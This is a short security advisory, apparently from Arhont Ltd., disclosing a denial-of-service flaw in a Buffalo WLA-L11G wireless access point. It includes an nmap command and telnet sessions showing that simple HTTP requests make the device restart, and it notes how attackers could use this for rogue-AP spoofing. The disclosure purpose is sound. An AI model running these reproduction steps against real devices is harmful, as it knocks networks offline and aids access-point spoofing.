Vulnerable systems:
* WLA-L11G version 2.31 (WLI-PCM-L11G Ver.6.14)
While performing a network testing, we have found a Buffalo Access Point (WLA-L11G Ver.2.31) vulnerable to a Denial of Service (DoS) attack. Simply using network scanning tool such as NMap with version grabbing (www.insecure.org) in the following manner restarts the AP:
$ nmap -sVVV -p 80 192.168.177.250
Where 192.168.177.250 is an IP address of Buffalo AP. Analyzing network traffic shows the following:
Attacks can also be reproduced manually via telnet:
andrei@192.168.177.7:~$ telnet 192.168.177.250 80
Trying 192.168.177.250...
Connected to 192.168.177.250 (192.168.177.250).
Escape character is '^]'.
GET / HTTP/1.0
Connection closed by foreign host.
And
andrei@192.168.177.7:~$ telnet 192.168.177.250 80
Trying 192.168.177.250...
Connected to 192.168.177.250 (192.168.177.250).
Escape character is '^]'.
get
Connection closed by foreign host.
(Where, there is a <space> after get; without the <space>, the AP doesn't restart)
Impact:
This vulnerability can be implemented by the attacker to restart the AP. This might be useful if the configuration files have been changed by the attacker and the AP restart is required to implement the changes. It is also possible to implement this attack to spoof an AP and make the clients connect to rouge or spoofed AP instead of legitimate one.
Vendor response:
According to the Arhont Ltd. policy, all of the found vulnerabilities and security issues will be reported to the manufacturer 7 days before releasing to public domain (such as CERT and BUGTRAQ).
If you would like to get more information about this issue, please do not hesitate to contact Arhont team.
